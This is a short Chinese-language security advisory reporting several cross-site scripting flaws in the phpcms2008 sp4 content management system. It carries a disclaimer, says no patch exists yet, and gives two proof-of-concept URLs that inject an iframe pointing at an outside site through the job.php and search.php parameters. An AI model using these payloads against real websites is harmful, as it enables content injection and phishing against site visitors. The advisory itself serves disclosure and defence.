phpcms2008 sp4 网站内容管理系统多处跨站漏洞

影响版本:
phpcms2008 sp4
漏洞描述:
Phpcms 是国内领先的网站内容管理系统,同时也是一个开源的PHP开发框架。Phpcms由内容模型、会员、问吧、专题、财务、订单、广告、邮件订阅、 短消息、自定义表单、全站搜索等20多个功能模块组成,内置新闻、图片、下载、信息、产品5大内容模型。Phpcms 采用模块化开发,支持自定义内容模型和会员模型,并且可以自定义字段。  

对用户输入处理不严,存在多处跨站漏洞
 
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

http://ssvdb.com/yp/job.php?action=applylist&inputtime=1&experience=%22%3E%3CIFRAME%20src=http://www.zhuba.net%3E

http://ssvdb.com/ask/search.php?keywords="><iframe src=http://www.zhuba.net>
安全建议:
厂商补丁:
PHPCMS
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpcms.cn/